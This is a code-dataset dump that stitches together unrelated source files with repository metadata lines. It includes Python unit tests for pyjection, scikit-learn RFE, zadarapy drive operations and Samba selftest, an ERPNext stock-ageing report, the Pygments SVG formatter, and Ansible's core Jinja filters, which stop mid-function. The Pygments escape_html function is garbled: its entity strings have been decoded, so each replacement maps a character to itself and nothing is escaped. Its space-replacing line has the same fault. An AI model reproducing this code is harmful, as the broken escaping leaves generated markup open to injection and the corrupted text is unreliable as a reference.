print('time used: {0} ms'.format(time * 1000))
except Exception as e:
print('===== test failed =====')
raise e
finally:
os.chdir(BASE_DIR)
print("Cleaning...", end='')
shutil.rmtree(TEST_DIR)
print("Done")
| mit |
Darkheir/pyjection | tests/unit/test_dependency_injector.py | 1 | 3227 | from unittest import TestCase
from unittest.mock import Mock
from pyjection.dependency_injector import DependencyInjector
from pyjection.service import Service
class TestDependencyInjector(TestCase):
def setUp(self):
self.injector = DependencyInjector()
def test_register(self):
result = self.injector.register(Mock, 'identifier')
self.assertIsInstance(result, Service)
def test_register_without_identifier(self):
result = self.injector.register(Mock)
self.assertIsInstance(result, Service)
def test_register_singleton_returns_service(self):
result = self.injector.register_singleton(Mock, 'identifier')
self.assertIsInstance(result, Service)
def test_register_singleton(self):
result = self.injector.register_singleton(Mock, 'identifier')
self.assertTrue(result.is_singleton)
def test_register_singleton_without_identifier(self):
result = self.injector.register_singleton(Mock)
self.assertTrue(result.is_singleton)
def test_has_service_returns_false(self):
success = self.injector.has_service('no_service')
self.assertFalse(success)
def test_has_service_returns_true(self):
self.injector._services['fake_service'] = None
success = self.injector.has_service('fake_service')
self.assertTrue(success)
def test_has_service_with_class(self):
self.injector._services['mock'] = None
success = self.injector.has_service(Mock)
self.assertTrue(success)
def test_get_error(self):
with self.assertRaises(Exception):
self.injector.get('no_service')
def test_get_singleton_class(self):
self._register_singleton()
subject1 = self.injector.get('fake_service')
self.assertIsInstance(subject1, Mock)
def test_get_singleton_same_instance(self):
self._register_singleton()
subject1 = self.injector.get('fake_service')
subject2 = self.injector.get('fake_service')
self.assertEqual(subject1, subject2)
def _register_singleton(self):
fake_service = Service(Mock)
fake_service.is_singleton = True
self.injector._services['fake_service'] = fake_service
def test_get_class(self):
fake_service = Service(Mock())
self.injector._services['fake_service'] = fake_service
subject1 = self.injector.get('fake_service')
self.assertIsInstance(subject1, Mock)
def test_get_uninstantiated(self):
mock = Mock()
fake_service = Service(mock)
self.injector._services['fake_service'] = fake_service
subject1 = self.injector.get_uninstantiated('fake_service')
self.assertIs(subject1, mock)
def test_get_class_identifier(self):
fake_service = Service(Mock)
self.injector._services['mock'] = fake_service
subject1 = self.injector.get(Mock)
self.assertIsInstance(subject1, Mock)
def test_get_instance(self):
subject = Mock()
fake_service = Service(subject)
self.injector._services['fake_service'] = fake_service
result = self.injector.get('fake_service')
self.assertEqual(subject, result)
| mit |
pypot/scikit-learn | sklearn/feature_selection/tests/test_rfe.py | 209 | 11733 | """
Testing Recursive feature elimination
"""
import warnings
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
from nose.tools import assert_equal, assert_true
from scipy import sparse
from sklearn.feature_selection.rfe import RFE, RFECV
from sklearn.datasets import load_iris, make_friedman1
from sklearn.metrics import zero_one_loss
from sklearn.svm import SVC, SVR
from sklearn.ensemble import RandomForestClassifier
from sklearn.cross_validation import cross_val_score
from sklearn.utils import check_random_state
from sklearn.utils.testing import ignore_warnings
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import assert_greater
from sklearn.metrics import make_scorer
from sklearn.metrics import get_scorer
class MockClassifier(object):
"""
Dummy classifier to test recursive feature ellimination
"""
def __init__(self, foo_param=0):
self.foo_param = foo_param
def fit(self, X, Y):
assert_true(len(X) == len(Y))
self.coef_ = np.ones(X.shape[1], dtype=np.float64)
return self
def predict(self, T):
return T.shape[0]
predict_proba = predict
decision_function = predict
transform = predict
def score(self, X=None, Y=None):
if self.foo_param > 1:
score = 1.
else:
score = 0.
return score
def get_params(self, deep=True):
return {'foo_param': self.foo_param}
def set_params(self, **params):
return self
def test_rfe_set_params():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
y = iris.target
clf = SVC(kernel="linear")
rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
y_pred = rfe.fit(X, y).predict(X)
clf = SVC()
with warnings.catch_warnings(record=True):
# estimator_params is deprecated
rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1,
estimator_params={'kernel': 'linear'})
y_pred2 = rfe.fit(X, y).predict(X)
assert_array_equal(y_pred, y_pred2)
def test_rfe_features_importance():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
y = iris.target
clf = RandomForestClassifier(n_estimators=20,
random_state=generator, max_depth=2)
rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
rfe.fit(X, y)
assert_equal(len(rfe.ranking_), X.shape[1])
clf_svc = SVC(kernel="linear")
rfe_svc = RFE(estimator=clf_svc, n_features_to_select=4, step=0.1)
rfe_svc.fit(X, y)
# Check if the supports are equal
assert_array_equal(rfe.get_support(), rfe_svc.get_support())
def test_rfe_deprecation_estimator_params():
deprecation_message = ("The parameter 'estimator_params' is deprecated as "
"of version 0.16 and will be removed in 0.18. The "
"parameter is no longer necessary because the "
"value is set via the estimator initialisation or "
"set_params method.")
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
y = iris.target
assert_warns_message(DeprecationWarning, deprecation_message,
RFE(estimator=SVC(), n_features_to_select=4, step=0.1,
estimator_params={'kernel': 'linear'}).fit,
X=X,
y=y)
assert_warns_message(DeprecationWarning, deprecation_message,
RFECV(estimator=SVC(), step=1, cv=5,
estimator_params={'kernel': 'linear'}).fit,
X=X,
y=y)
def test_rfe():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
X_sparse = sparse.csr_matrix(X)
y = iris.target
# dense model
clf = SVC(kernel="linear")
rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
rfe.fit(X, y)
X_r = rfe.transform(X)
clf.fit(X_r, y)
assert_equal(len(rfe.ranking_), X.shape[1])
# sparse model
clf_sparse = SVC(kernel="linear")
rfe_sparse = RFE(estimator=clf_sparse, n_features_to_select=4, step=0.1)
rfe_sparse.fit(X_sparse, y)
X_r_sparse = rfe_sparse.transform(X_sparse)
assert_equal(X_r.shape, iris.data.shape)
assert_array_almost_equal(X_r[:10], iris.data[:10])
assert_array_almost_equal(rfe.predict(X), clf.predict(iris.data))
assert_equal(rfe.score(X, y), clf.score(iris.data, iris.target))
assert_array_almost_equal(X_r, X_r_sparse.toarray())
def test_rfe_mockclassifier():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
y = iris.target
# dense model
clf = MockClassifier()
rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
rfe.fit(X, y)
X_r = rfe.transform(X)
clf.fit(X_r, y)
assert_equal(len(rfe.ranking_), X.shape[1])
assert_equal(X_r.shape, iris.data.shape)
def test_rfecv():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
y = list(iris.target) # regression test: list should be supported
# Test using the score function
rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5)
rfecv.fit(X, y)
# non-regression test for missing worst feature:
assert_equal(len(rfecv.grid_scores_), X.shape[1])
assert_equal(len(rfecv.ranking_), X.shape[1])
X_r = rfecv.transform(X)
# All the noisy variable were filtered out
assert_array_equal(X_r, iris.data)
# same in sparse
rfecv_sparse = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5)
X_sparse = sparse.csr_matrix(X)
rfecv_sparse.fit(X_sparse, y)
X_r_sparse = rfecv_sparse.transform(X_sparse)
assert_array_equal(X_r_sparse.toarray(), iris.data)
# Test using a customized loss function
scoring = make_scorer(zero_one_loss, greater_is_better=False)
rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
scoring=scoring)
ignore_warnings(rfecv.fit)(X, y)
X_r = rfecv.transform(X)
assert_array_equal(X_r, iris.data)
# Test using a scorer
scorer = get_scorer('accuracy')
rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
scoring=scorer)
rfecv.fit(X, y)
X_r = rfecv.transform(X)
assert_array_equal(X_r, iris.data)
# Test fix on grid_scores
def test_scorer(estimator, X, y):
return 1.0
rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
scoring=test_scorer)
rfecv.fit(X, y)
assert_array_equal(rfecv.grid_scores_, np.ones(len(rfecv.grid_scores_)))
# Same as the first two tests, but with step=2
rfecv = RFECV(estimator=SVC(kernel="linear"), step=2, cv=5)
rfecv.fit(X, y)
assert_equal(len(rfecv.grid_scores_), 6)
assert_equal(len(rfecv.ranking_), X.shape[1])
X_r = rfecv.transform(X)
assert_array_equal(X_r, iris.data)
rfecv_sparse = RFECV(estimator=SVC(kernel="linear"), step=2, cv=5)
X_sparse = sparse.csr_matrix(X)
rfecv_sparse.fit(X_sparse, y)
X_r_sparse = rfecv_sparse.transform(X_sparse)
assert_array_equal(X_r_sparse.toarray(), iris.data)
def test_rfecv_mockclassifier():
generator = check_random_state(0)
iris = load_iris()
X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
y = list(iris.target) # regression test: list should be supported
# Test using the score function
rfecv = RFECV(estimator=MockClassifier(), step=1, cv=5)
rfecv.fit(X, y)
# non-regression test for missing worst feature:
assert_equal(len(rfecv.grid_scores_), X.shape[1])
assert_equal(len(rfecv.ranking_), X.shape[1])
def test_rfe_estimator_tags():
rfe = RFE(SVC(kernel='linear'))
assert_equal(rfe._estimator_type, "classifier")
# make sure that cross-validation is stratified
iris = load_iris()
score = cross_val_score(rfe, iris.data, iris.target)
assert_greater(score.min(), .7)
def test_rfe_min_step():
n_features = 10
X, y = make_friedman1(n_samples=50, n_features=n_features, random_state=0)
n_samples, n_features = X.shape
estimator = SVR(kernel="linear")
# Test when floor(step * n_features) <= 0
selector = RFE(estimator, step=0.01)
sel = selector.fit(X, y)
assert_equal(sel.support_.sum(), n_features // 2)
# Test when step is between (0,1) and floor(step * n_features) > 0
selector = RFE(estimator, step=0.20)
sel = selector.fit(X, y)
assert_equal(sel.support_.sum(), n_features // 2)
# Test when step is an integer
selector = RFE(estimator, step=5)
sel = selector.fit(X, y)
assert_equal(sel.support_.sum(), n_features // 2)
def test_number_of_subsets_of_features():
# In RFE, 'number_of_subsets_of_features'
# = the number of iterations in '_fit'
# = max(ranking_)
# = 1 + (n_features + step - n_features_to_select - 1) // step
# After optimization #4534, this number
# = 1 + np.ceil((n_features - n_features_to_select) / float(step))
# This test case is to test their equivalence, refer to #4534 and #3824
def formula1(n_features, n_features_to_select, step):
return 1 + ((n_features + step - n_features_to_select - 1) // step)
def formula2(n_features, n_features_to_select, step):
return 1 + np.ceil((n_features - n_features_to_select) / float(step))
# RFE
# Case 1, n_features - n_features_to_select is divisible by step
# Case 2, n_features - n_features_to_select is not divisible by step
n_features_list = [11, 11]
n_features_to_select_list = [3, 3]
step_list = [2, 3]
for n_features, n_features_to_select, step in zip(
n_features_list, n_features_to_select_list, step_list):
generator = check_random_state(43)
X = generator.normal(size=(100, n_features))
y = generator.rand(100).round()
rfe = RFE(estimator=SVC(kernel="linear"),
n_features_to_select=n_features_to_select, step=step)
rfe.fit(X, y)
# this number also equals to the maximum of ranking_
assert_equal(np.max(rfe.ranking_),
formula1(n_features, n_features_to_select, step))
assert_equal(np.max(rfe.ranking_),
formula2(n_features, n_features_to_select, step))
# In RFECV, 'fit' calls 'RFE._fit'
# 'number_of_subsets_of_features' of RFE
# = the size of 'grid_scores' of RFECV
# = the number of iterations of the for loop before optimization #4534
# RFECV, n_features_to_select = 1
# Case 1, n_features - 1 is divisible by step
# Case 2, n_features - 1 is not divisible by step
n_features_to_select = 1
n_features_list = [11, 10]
step_list = [2, 2]
for n_features, step in zip(n_features_list, step_list):
generator = check_random_state(43)
X = generator.normal(size=(100, n_features))
y = generator.rand(100).round()
rfecv = RFECV(estimator=SVC(kernel="linear"), step=step, cv=5)
rfecv.fit(X, y)
assert_equal(rfecv.grid_scores_.shape[0],
formula1(n_features, n_features_to_select, step))
assert_equal(rfecv.grid_scores_.shape[0],
formula2(n_features, n_features_to_select, step))
| bsd-3-clause |
saurabh6790/ON-RISAPP | stock/report/stock_ageing/stock_ageing.py | 29 | 3160 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.utils import date_diff
def execute(filters=None):
columns = get_columns()
item_details = get_fifo_queue(filters)
to_date = filters["to_date"]
data = []
for item, item_dict in item_details.items():
fifo_queue = item_dict["fifo_queue"]
details = item_dict["details"]
if not fifo_queue: continue
average_age = get_average_age(fifo_queue, to_date)
earliest_age = date_diff(to_date, fifo_queue[0][1])
latest_age = date_diff(to_date, fifo_queue[-1][1])
data.append([item, details.item_name, details.description, details.item_group,
details.brand, average_age, earliest_age, latest_age, details.stock_uom])
return columns, data
def get_average_age(fifo_queue, to_date):
batch_age = age_qty = total_qty = 0.0
for batch in fifo_queue:
batch_age = date_diff(to_date, batch[1])
age_qty += batch_age * batch[0]
total_qty += batch[0]
return (age_qty / total_qty) if total_qty else 0.0
def get_columns():
return ["Item Code:Link/Item:100", "Item Name::100", "Description::200",
"Item Group:Link/Item Group:100", "Brand:Link/Brand:100", "Average Age:Float:100",
"Earliest:Int:80", "Latest:Int:80", "UOM:Link/UOM:100"]
def get_fifo_queue(filters):
item_details = {}
for d in get_stock_ledger_entries(filters):
item_details.setdefault(d.name, {"details": d, "fifo_queue": []})
fifo_queue = item_details[d.name]["fifo_queue"]
if d.actual_qty > 0:
fifo_queue.append([d.actual_qty, d.posting_date])
else:
qty_to_pop = abs(d.actual_qty)
while qty_to_pop:
batch = fifo_queue[0] if fifo_queue else [0, None]
if 0 < batch[0] <= qty_to_pop:
# if batch qty > 0
# not enough or exactly same qty in current batch, clear batch
qty_to_pop -= batch[0]
fifo_queue.pop(0)
else:
# all from current batch
batch[0] -= qty_to_pop
qty_to_pop = 0
return item_details
def get_stock_ledger_entries(filters):
return webnotes.conn.sql("""select
item.name, item.item_name, item_group, brand, description, item.stock_uom,
actual_qty, posting_date
from `tabStock Ledger Entry` sle,
(select name, item_name, description, stock_uom, brand, item_group
from `tabItem` {item_conditions}) item
where item_code = item.name and
company = %(company)s and
posting_date <= %(to_date)s
{sle_conditions}
order by posting_date, posting_time, sle.name"""\
.format(item_conditions=get_item_conditions(filters),
sle_conditions=get_sle_conditions(filters)), filters, as_dict=True)
def get_item_conditions(filters):
conditions = []
if filters.get("item_code"):
conditions.append("item_code=%(item_code)s")
if filters.get("brand"):
conditions.append("brand=%(brand)s")
return "where {}".format(" and ".join(conditions)) if conditions else ""
def get_sle_conditions(filters):
conditions = []
if filters.get("warehouse"):
conditions.append("warehouse=%(warehouse)s")
return "and {}".format(" and ".join(conditions)) if conditions else "" | agpl-3.0 |
zadarastorage/zadarapy | tests/vpsa/test_00_drives.py | 1 | 2974 | # Copyright 2019 Zadara Storage, Inc.
# Originally authored by Jeremy Brown - https://github.com/jwbrown77
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from zadarapy.validators import is_valid_volume_id
from zadarapy.vpsa.drives import get_free_drives, get_drive, rename_drive, \
get_drive_performance, cancel_shred_drive, shred_drive
def test_get_all_drives(all_drives):
assert all_drives['response']['count'] >= 2
for drive in all_drives['response']['disks']:
assert is_valid_volume_id(drive['name'])
def test_get_free_drives(zsession):
free_drives = get_free_drives(zsession)
for drive in free_drives['response']['disks']:
assert drive['raid_group_name'] is None
def test_get_drive(zsession, all_drives):
drive = get_drive(zsession, all_drives['response']['disks'][0]['name'])
assert is_valid_volume_id(drive['response']['disk']['name'])
def test_rename_drive(zsession, all_drives):
new_name = str(uuid.uuid4())
rename_drive(zsession, all_drives['response']['disks'][0]['name'],
new_name)
drive = get_drive(zsession, all_drives['response']['disks'][0]['name'])
name = drive['response']['disk']['display_name']
assert name == new_name
# def test_remove_drive(zsession, all_drives):
# drive_id = all_drives['response']['disks'][-1]['name']
#
# remove_drive(zsession, drive_id)
#
# drives = get_all_drives(zsession)
#
# for drive in drives['response']['disks']:
# assert not drive['name'] == drive_id
def test_shred_drive(zsession, all_drives):
drive_id = all_drives['response']['disks'][0]['name']
shred_drive(zsession, drive_id)
drive = get_drive(zsession, all_drives['response']['disks'][0]['name'])
status = drive['response']['disk']['status']
assert status.startswith('Shredding')
def test_cancel_shred_drive(zsession, all_drives):
drive_id = all_drives['response']['disks'][0]['name']
cancel_shred_drive(zsession, drive_id)
drive = get_drive(zsession, all_drives['response']['disks'][0]['name'])
status = drive['response']['disk']['status']
assert not status.startswith('Shredding')
def test_get_drive_performance(zsession, all_drives):
drive_id = all_drives['response']['disks'][0]['name']
performance = get_drive_performance(zsession, drive_id)
num_of_usages = len(performance['response']['usages'])
assert performance['response']['count'] == num_of_usages
| apache-2.0 |
jkstrick/samba | selftest/tests/test_samba.py | 20 | 2864 | # test_run.py -- Tests for selftest.target.samba
# Copyright (C) 2012 Jelmer Vernooij <jelmer@samba.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 3
# of the License or (at your option) any later version of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Tests for selftest.target.samba."""
from cStringIO import StringIO
from samba.tests import TestCase
from selftest.target.samba import (
bindir_path,
get_interface,
mk_realms_stanza,
write_krb5_conf,
)
class BinDirPathTests(TestCase):
def test_mapping(self):
self.assertEquals("exe",
bindir_path("/some/path", "exe"))
self.assertEquals("/bin/exe",
bindir_path("/bin", "/bin/exe"))
def test_no_mapping(self):
self.assertEqual("exe", bindir_path("/some/path", "exe"))
self.assertEqual("/bin/ls",
bindir_path("/bin", "ls"))
class MkRealmsStanzaTests(TestCase):
def test_basic(self):
self.assertEqual(
mk_realms_stanza("rijk", "dnsnaam", "domein", "ipv4_kdc"),
'''\
rijk = {
kdc = ipv4_kdc:88
admin_server = ipv4_kdc:88
default_domain = dnsnaam
}
dnsnaam = {
kdc = ipv4_kdc:88
admin_server = ipv4_kdc:88
default_domain = dnsnaam
}
domein = {
kdc = ipv4_kdc:88
admin_server = ipv4_kdc:88
default_domain = dnsnaam
}
''')
class WriteKrb5ConfTests(TestCase):
def test_simple(self):
f = StringIO()
write_krb5_conf(f, "rijk", "dnsnaam", "domein", "kdc_ipv4")
self.assertEquals('''\
#Generated krb5.conf for rijk
[libdefaults]
\tdefault_realm = rijk
\tdns_lookup_realm = false
\tdns_lookup_kdc = false
\tticket_lifetime = 24h
\tforwardable = yes
\tallow_weak_crypto = yes
[realms]
rijk = {
kdc = kdc_ipv4:88
admin_server = kdc_ipv4:88
default_domain = dnsnaam
}
dnsnaam = {
kdc = kdc_ipv4:88
admin_server = kdc_ipv4:88
default_domain = dnsnaam
}
domein = {
kdc = kdc_ipv4:88
admin_server = kdc_ipv4:88
default_domain = dnsnaam
}
''', f.getvalue())
class GetInterfaceTests(TestCase):
def test_get_interface(self):
self.assertEquals(21, get_interface("localdc"))
self.assertEquals(4, get_interface("localshare4"))
def test_unknown(self):
self.assertRaises(KeyError, get_interface, "unknown")
| gpl-3.0 |
morpheyesh/ghostblog | node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/formatters/svg.py | 362 | 5867 | # -*- coding: utf-8 -*-
"""
pygments.formatters.svg
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for SVG output.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import get_bool_opt, get_int_opt
__all__ = ['SvgFormatter']
def escape_html(text):
"""Escape &, <, > as well as single and double quotes for HTML."""
return text.replace('&', '&'). \
replace('<', '<'). \
replace('>', '>'). \
replace('"', '"'). \
replace("'", ''')
class2style = {}
class SvgFormatter(Formatter):
"""
Format tokens as an SVG graphics file. This formatter is still experimental.
Each line of code is a ``<text>`` element with explicit ``x`` and ``y``
coordinates containing ``<tspan>`` elements with the individual token styles.
By default, this formatter outputs a full SVG document including doctype
declaration and the ``<svg>`` root element.
*New in Pygments 0.9.*
Additional options accepted:
`nowrap`
Don't wrap the SVG ``<text>`` elements in ``<svg><g>`` elements and
don't add a XML declaration and a doctype. If true, the `fontfamily`
and `fontsize` options are ignored. Defaults to ``False``.
`fontfamily`
The value to give the wrapping ``<g>`` element's ``font-family``
attribute, defaults to ``"monospace"``.
`fontsize`
The value to give the wrapping ``<g>`` element's ``font-size``
attribute, defaults to ``"14px"``.
`xoffset`
Starting offset in X direction, defaults to ``0``.
`yoffset`
Starting offset in Y direction, defaults to the font size if it is given
in pixels, or ``20`` else. (This is necessary since text coordinates
refer to the text baseline, not the top edge.)
`ystep`
Offset to add to the Y coordinate for each subsequent line. This should
roughly be the text size plus 5. It defaults to that value if the text
size is given in pixels, or ``25`` else.
`spacehack`
Convert spaces in the source to `` ``, which are non-breaking
spaces. SVG provides the ``xml:space`` attribute to control how
whitespace inside tags is handled, in theory, the ``preserve`` value
could be used to keep all whitespace as-is. However, many current SVG
viewers don't obey that rule, so this option is provided as a workaround
and defaults to ``True``.
"""
name = 'SVG'
aliases = ['svg']
filenames = ['*.svg']
def __init__(self, **options):
# XXX outencoding
Formatter.__init__(self, **options)
self.nowrap = get_bool_opt(options, 'nowrap', False)
self.fontfamily = options.get('fontfamily', 'monospace')
self.fontsize = options.get('fontsize', '14px')
self.xoffset = get_int_opt(options, 'xoffset', 0)
fs = self.fontsize.strip()
if fs.endswith('px'): fs = fs[:-2].strip()
try:
int_fs = int(fs)
except:
int_fs = 20
self.yoffset = get_int_opt(options, 'yoffset', int_fs)
self.ystep = get_int_opt(options, 'ystep', int_fs + 5)
self.spacehack = get_bool_opt(options, 'spacehack', True)
self._stylecache = {}
def format_unencoded(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
For our implementation we put all lines in their own 'line group'.
"""
x = self.xoffset
y = self.yoffset
if not self.nowrap:
if self.encoding:
outfile.write('<?xml version="1.0" encoding="%s"?>\n' %
self.encoding)
else:
outfile.write('<?xml version="1.0"?>\n')
outfile.write('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" '
'"http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/'
'svg10.dtd">\n')
outfile.write('<svg xmlns="http://www.w3.org/2000/svg">\n')
outfile.write('<g font-family="%s" font-size="%s">\n' %
(self.fontfamily, self.fontsize))
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (x, y))
for ttype, value in tokensource:
style = self._get_style(ttype)
tspan = style and '<tspan' + style + '>' or ''
tspanend = tspan and '</tspan>' or ''
value = escape_html(value)
if self.spacehack:
value = value.expandtabs().replace(' ', ' ')
parts = value.split('\n')
for part in parts[:-1]:
outfile.write(tspan + part + tspanend)
y += self.ystep
outfile.write('</text>\n<text x="%s" y="%s" '
'xml:space="preserve">' % (x, y))
outfile.write(tspan + parts[-1] + tspanend)
outfile.write('</text>')
if not self.nowrap:
outfile.write('</g></svg>\n')
def _get_style(self, tokentype):
if tokentype in self._stylecache:
return self._stylecache[tokentype]
otokentype = tokentype
while not self.style.styles_token(tokentype):
tokentype = tokentype.parent
value = self.style.style_for_token(tokentype)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
return result
| mit |
KyleJamesWalker/ansible | lib/ansible/plugins/filter/core.py | 5 | 16905 | # (c) 2012, Jeroen Hoekx <jeroen@hoekx.be>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import crypt
import glob
import hashlib
import itertools
import json
import ntpath
import os.path
import re
import string
import sys
import uuid
from datetime import datetime
from functools import partial
from random import Random, SystemRandom, shuffle
import yaml
from jinja2.filters import environmentfilter, do_groupby as _do_groupby
try:
import passlib.hash
HAS_PASSLIB = True
except:
HAS_PASSLIB = False
from ansible import errors
from ansible.module_utils.six import iteritems, string_types, integer_types
from ansible.module_utils.six.moves import reduce, shlex_quote
from ansible.module_utils._text import to_bytes, to_text
from ansible.parsing.yaml.dumper import AnsibleDumper
from ansible.utils.hashing import md5s, checksum_s
from ansible.utils.unicode import unicode_wrap
from ansible.utils.vars import merge_hash
from ansible.vars.hostvars import HostVars
UUID_NAMESPACE_ANSIBLE = uuid.UUID('361E6D51-FAEC-444A-9079-341386DA8E2E')
class AnsibleJSONEncoder(json.JSONEncoder):
'''
Simple encoder class to deal with JSON encoding of internal
types like HostVars
'''
def default(self, o):
if isinstance(o, HostVars):
return dict(o)
else:
return super(AnsibleJSONEncoder, self).default(o)
def to_yaml(a, *args, **kw):
'''Make verbose, human readable yaml'''
transformed = yaml.dump(a, Dumper=AnsibleDumper, allow_unicode=True, **kw)
return to_text(transformed)
def to_nice_yaml(a, indent=4, *args, **kw):
'''Make verbose, human readable yaml'''
transformed = yaml.dump(a, Dumper=AnsibleDumper, indent=indent, allow_unicode=True, default_flow_style=False, **kw)
return to_text(transformed)
def to_json(a, *args, **kw):
''' Convert the value to JSON '''
return json.dumps(a, cls=AnsibleJSONEncoder, *args, **kw)
def to_nice_json(a, indent=4, *args, **kw):
'''Make verbose, human readable JSON'''
# python-2.6's json encoder is buggy (can't encode hostvars)
if sys.version_info < (2, 7):
try:
import simplejson
except ImportError:
pass
else:
try:
major = int(simplejson.__version__.split('.')[0])
except:
pass
else:
if major >= 2:
return simplejson.dumps(a, indent=indent, sort_keys=True, *args, **kw)
try:
return json.dumps(a, indent=indent, sort_keys=True, cls=AnsibleJSONEncoder, *args, **kw)
except:
# Fallback to the to_json filter
return to_json(a, *args, **kw)
def to_bool(a):
''' return a bool for the arg '''
if a is None or type(a) == bool:
return a
if isinstance(a, string_types):
a = a.lower()
if a in ['yes', 'on', '1', 'true', 1]:
return True
else:
return False
def to_datetime(string, format="%Y-%d-%m %H:%M:%S"):
return datetime.strptime(string, format)
def quote(a):
''' return its argument quoted for shell usage '''
return shlex_quote(a)
def fileglob(pathname):
''' return list of matched regular files for glob '''
return [ g for g in glob.glob(pathname) if os.path.isfile(g) ]
def regex_replace(value='', pattern='', replacement='', ignorecase=False):
''' Perform a `re.sub` returning a string '''
value = to_text(value, errors='surrogate_or_strict', nonstring='simplerepr')
if ignorecase:
flags = re.I
else:
flags = 0
_re = re.compile(pattern, flags=flags)
return _re.sub(replacement, value)
def regex_findall(value, regex, multiline=False, ignorecase=False):
''' Perform re.findall and return the list of matches '''
flags = 0
if ignorecase:
flags |= re.I
if multiline:
flags |= re.M
return re.findall(regex, value, flags)
def regex_search(value, regex, *args, **kwargs):
''' Perform re.search and return the list of matches or a backref '''
groups = list()
for arg in args:
if arg.startswith('\\g'):
match = re.match(r'\\g<(\S+)>', arg).group(1)
groups.append(match)
elif arg.startswith('\\'):
match = int(re.match(r'\\(\d+)', arg).group(1))
groups.append(match)
else:
raise errors.AnsibleFilterError('Unknown argument')
flags = 0
if kwargs.get('ignorecase'):
flags |= re.I
if kwargs.get('multiline'):
flags |= re.M
match = re.search(regex, value, flags)
if match:
if not groups:
return match.group()
else:
items = list()
for item in groups:
items.append(match.group(item))
return items
def ternary(value, true_val, false_val):
''' value ? true_val : false_val '''
if value:
return true_val
else:
return false_val
def regex_escape(string):
'''Escape all regular expressions special characters from STRING.'''
return re.escape(string)
def from_yaml(data):
if isinstance(data, string_types):
return yaml.safe_load(data)
return data
@environmentfilter
def rand(environment, end, start=None, step=None, seed=None):
if seed is None:
r = SystemRandom()
else:
r = Random(seed)
if isinstance(end, integer_types):
if not start:
start = 0
if not step:
step = 1
return r.randrange(start, end, step)
elif hasattr(end, '__iter__'):
if start or step:
raise errors.AnsibleFilterError('start and step can only be used with integer values')
return r.choice(end)
else:
raise errors.AnsibleFilterError('random can only be used on sequences and integers')
def randomize_list(mylist, seed=None):
try:
mylist = list(mylist)
if seed:
r = Random(seed)
r.shuffle(mylist)
else:
shuffle(mylist)
except:
pass
return mylist
def get_hash(data, hashtype='sha1'):
try: # see if hash is supported
h = hashlib.new(hashtype)
except:
return None
h.update(to_bytes(data, errors='surrogate_then_strict'))
return h.hexdigest()
def get_encrypted_password(password, hashtype='sha512', salt=None):
# TODO: find a way to construct dynamically from system
cryptmethod= {
'md5': '1',
'blowfish': '2a',
'sha256': '5',
'sha512': '6',
}
if hashtype in cryptmethod:
if salt is None:
r = SystemRandom()
if hashtype in ['md5']:
saltsize = 8
else:
saltsize = 16
salt = ''.join([r.choice(string.ascii_letters + string.digits) for _ in range(saltsize)])
if not HAS_PASSLIB:
if sys.platform.startswith('darwin'):
